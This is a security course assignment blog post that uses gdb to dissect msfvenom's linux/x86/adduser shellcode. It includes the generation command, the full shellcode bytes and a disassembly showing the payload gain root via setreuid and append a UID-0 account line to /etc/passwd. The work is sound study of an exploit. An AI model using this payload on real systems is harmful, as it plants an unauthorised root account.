SLAE: Assignment #5.2

Assignment Task:

Take up at least 3 shellcode samples created using msfvenom for linux/x86
Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
Present your analysis

Shellcode chosen:


linux/x86/adduser

Shellcode options:

Command to generate shellcode:


msfvenom -p  linux/x86/adduser USER=ycsc PASS=ycsc -b '\x00' -f c

Generated shellcode:


"\xb8\xed\xcb\x84\x44\xda\xdd\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x17\x31\x42\x15\x83\xc2\x04\x03\x42\x11\xe2\x18\xfa\x4d\xcd"
"\x29\x97\x0b\x96\x60\xe8\xfe\x23\x22\xd8\x37\x7a\xba\x69\xbb"
"\x0a\x5e\xe6\x14\xda\xee\x97\x02\x0b\x6b\x2c\xb0\xda\x90\x8d"
"\x83\xd9\x9b\x8e\x7f\x09\x01\x8f\x7f\xca\x3c\xec\x0c\xa9\x84"
"\xb3\x88\x68\x9d\x0a\x08\x3b\x29\x5d\xa4\xc2\xb3\xf6\x72\x05"
"\x09\x39\xb9\x5f\x42\x03\x92\xfd\xf5\x1d\xc3\x72\x6d\xe8\x42"
"\xfe\x3c\x10\x1e\x04\xe6\x25\x5f\x6e\x17\xee\xad\xef"

/etc/passwd file before executing the shellcode:

Testing shellcode with run_shellcode.c

Let’s analyze the shellcode with gdb:

Placed a breakpoint at code variable, defined hook-stop and issued run command:

We have hit our breakpoint and this is the state of CPU registers:

Examining the contents at memory loaction 0x0804a040 (i.e. where EIP is pointing to at present):

We are at the begining of our shellcode. We step into the code few times to let the decoder work:

We have entered a loop. Placing the breakpoint at 0x0804a05b (the next instruction after loop) and continuing the execution of the program:

Disassembling 90 bytes from eip. This is our decoded shellcode:


   0x0804a05b &lt;code+27&gt;:   xor    ecx,ecx
   0x0804a05d &lt;code+29&gt;:   mov    ebx,ecx
   0x0804a05f &lt;code+31&gt;:   push   0x46
   0x0804a061 &lt;code+33&gt;:   pop    eax
   0x0804a062 &lt;code+34&gt;:   int    0x80

The above code executes syscall number 0x46 (70 in decimal). This syscall number represents (setreuid):

This syscall takes in two arguments as shown below:

Setting these arguments to 0 is required to edit /etc/passwd file.


   0x0804a064 &lt;code+36&gt;:   push   0x5
   0x0804a066 &lt;code+38&gt;:   pop    eax
   0x0804a067 &lt;code+39&gt;:   xor    ecx,ecx
   0x0804a069 &lt;code+41&gt;:   push   ecx
   0x0804a06a &lt;code+42&gt;:   push   0x64777373
   0x0804a06f &lt;code+47&gt;:   push   0x61702f2f
   0x0804a074 &lt;code+52&gt;:   push   0x6374652f
   0x0804a079 &lt;code+57&gt;:   mov    ebx,esp
   0x0804a07b &lt;code+59&gt;:   inc    ecx
   0x0804a07c &lt;code+60&gt;:   mov    ch,0x4
   0x0804a07e &lt;code+62&gt;:   int    0x80

The above code executes the syscall number 0x5 (05 in decimal). This syscall number represents (open)

This syscall takes in two arguments as shown below:

The assembly code stores the value ‘/etc//passwd’ on stack and stores the pointer to this string in ebx. It then sets the ecx to the value 0x00000401 (O_WRONLY | O_APPEND) and executes the syscall.


   0x0804a080 &lt;code+64&gt;:   xchg   ebx,eax
   0x0804a081 &lt;code+65&gt;:   call   0x804a0a8 &lt;code+104&gt;
   0x0804a086 &lt;code+70&gt;:   jns    0x804a0eb
   0x0804a088 &lt;code+72&gt;:   jae    0x804a0ed
   0x0804a08a &lt;code+74&gt;:   cmp    al,BYTE PTR [ecx+0x7a]
   0x0804a08d &lt;code+77&gt;:   inc    ebp
   0x0804a08e &lt;code+78&gt;:   cmp    DWORD PTR gs:[ebp+0x48],esp
   0x0804a092 &lt;code+82&gt;:   je     0x804a0c4
   0x0804a094 &lt;code+84&gt;:   jbe    0x804a10f
   0x0804a096 &lt;code+86&gt;:   bound  ebp,QWORD PTR [ebx+0x3a]
   0x0804a099 &lt;code+89&gt;:   xor    BYTE PTR [edx],bh
   0x0804a09b &lt;code+91&gt;:   xor    BYTE PTR [edx],bh
   0x0804a09d &lt;code+93&gt;:   cmp    ch,BYTE PTR [edi]
   0x0804a09f &lt;code+95&gt;:   cmp    ch,BYTE PTR [edi]
   0x0804a0a1 &lt;code+97&gt;:   bound  ebp,QWORD PTR [ecx+0x6e]
   0x0804a0a4 &lt;code+100&gt;:  das    
   0x0804a0a5 &lt;code+101&gt;:  jae    0x804a10f
   0x0804a0a7 &lt;code+103&gt;:  or     bl,BYTE PTR [ecx-0x75]
   0x0804a0aa &lt;code+106&gt;:  push   ecx
   0x0804a0ab &lt;code+107&gt;:  cld    
   0x0804a0ac &lt;code+108&gt;:  push   0x4
   0x0804a0ae &lt;code+110&gt;:  pop    eax
   0x0804a0af &lt;code+111&gt;:  int    0x80

The above code executes the syscall number 0x4 (04 in decimal). This syscall number represents (write)

This syscall takes in three arguments as shown below:

The assembly code stores the file descriptor in ebx. It then stores the string ‘ycsc:AzEe9eHt0vybk:0:0::/:/bin/sh’ on stack and executes the syscall.

As can be seen from the above image, instructions from 0x0804a086 to 0x0804a0a7 are hex values for the string ‘ycsc:AzEe9eHt0vybk:0:0::/:/bin/sh’. These hex values have been translated by gdb as instructions.


   0x0804a0b1 &lt;code+113&gt;:  push   0x1
   0x0804a0b3 &lt;code+115&gt;:  pop    eax
   0x0804a0b4 &lt;code+116&gt;:  int    0x80

These instructions execute the exit syscall.

Github repository for this assignment: Assignment 5/5-2

————————

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

https://www.pentesteracademy.com/course?id=3

Student ID: SLAE-897

Uday Mittal

Uday Mittal is a cybersecurity professional with rich working experience working with various industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM, CRISC among others. He speaks on cybersecurity awareness, offensive security research etc. and has authored various articles on topics related to cyber security and software development for a leading magazine on open source software.

Related Posts

Categories

Top Posts

Related Posts

Categories

Tags

Top Posts